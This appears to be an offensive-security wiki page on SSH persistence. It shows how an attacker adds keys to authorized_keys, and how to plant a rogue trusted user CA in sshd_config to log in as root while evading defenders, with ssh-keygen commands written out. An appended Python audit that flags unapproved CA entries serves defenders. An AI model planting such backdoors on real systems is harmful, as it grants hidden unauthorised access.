Secondary Categories: 02-Persistence

Authorized Keys

By default, SSH lets a remote user connect with a username and password, but what if that user changes their password? We can use the SSH authorized keys file and place our SSH public key in the user's ~/.ssh/authorized_keys file to authenticate as that user.

Trusted User CA Keys

What if we want to be a little more stealthy? Defenders will automatically check the ~/.ssh/authorized_keys file for anything suspicious… We can get around this by using a trusted user CA key to sign all our keys and sign in as any user.

# Create a key pair. This command outputs two files: the public key (ca.pub) and the private key (ca)
ssh-keygen -C CA -f ca

Next we need to configure the server to trust the newly created CA in /etc/ssh/sshd_config:

Copy ca.pub and place it in /etc/ssh/ca.pub.

Edit /etc/ssh/sshd_config to add the line TrustedUserCAKeys /etc/ssh/ca.pub.

Restart the SSH server.

Then we need to generate a key for a user:

ssh-keygen -t ecdsa

Now we need to sign the user key:

# This command will sign our user key and output a file called id_ecdsa-cert.pub
ssh-keygen -s ca -I ap3x -n root -z 1 id_ecdsa.pub

# We can inspect the certificate using the following command
ssh-keygen -Lf id_ecdsa-cert.pub

Now we can SSH into any server that trusts our CA key.
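
Because the TrustedUserCAKeys directive leaves nothing in ~/.ssh/authorized_keys, the place to look for it is sshd_config itself. The following audit is an added example, not part of the original page: it flags any TrustedUserCAKeys file that is not on an approved list. The approved path, the function names and the sample config are assumptions made for illustration.

```python
import re

# Assumption: CA public-key files your organisation has approved (hypothetical path).
APPROVED_CA_FILES = {"/etc/ssh/corp_user_ca.pub"}

# sshd_config accepts "Keyword value" and "Keyword=value"; keywords are case-insensitive.
DIRECTIVE = re.compile(r"([A-Za-z0-9]+)(?:\s*=\s*|\s+)(.*)")

def parse_directives(text):
    """Yield (lineno, context, keyword, value) for each sshd_config directive."""
    context = "global"
    for lineno, raw in enumerate(text.splitlines(), 1):
        m = DIRECTIVE.fullmatch(raw.strip())
        if not m:  # blank line or comment
            continue
        keyword, value = m.group(1).lower(), m.group(2).strip().strip('"')
        if keyword == "match":
            context = "match " + value  # directives below apply only to this block
            continue
        yield lineno, context, keyword, value

def audit(text, approved=APPROVED_CA_FILES):
    """Return (lineno, context, message) findings about user-certificate trust."""
    findings = []
    for lineno, context, keyword, value in parse_directives(text):
        if keyword == "trustedusercakeys" and value.lower() != "none":
            if value not in approved:
                findings.append((lineno, context, f"unapproved user CA file: {value}"))
        elif keyword == "include":
            # The directive may also live in an included file; those need the same audit.
            findings.append((lineno, context, f"review included files: {value}"))
    return findings

# Constructed sample config, not taken from a real host.
SAMPLE = """\
# sshd_config (constructed)
PermitRootLogin prohibit-password
Include /etc/ssh/sshd_config.d/*.conf
trustedusercakeys=/etc/ssh/ca.pub
Match User deploy
    TrustedUserCAKeys /etc/ssh/corp_user_ca.pub
"""

if __name__ == "__main__":
    for lineno, context, message in audit(SAMPLE):
        print(f"line {lineno} [{context}]: {message}")
```

Feeding it the output of `sshd -T` instead of a single file checks the effective configuration, with Include files already resolved.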

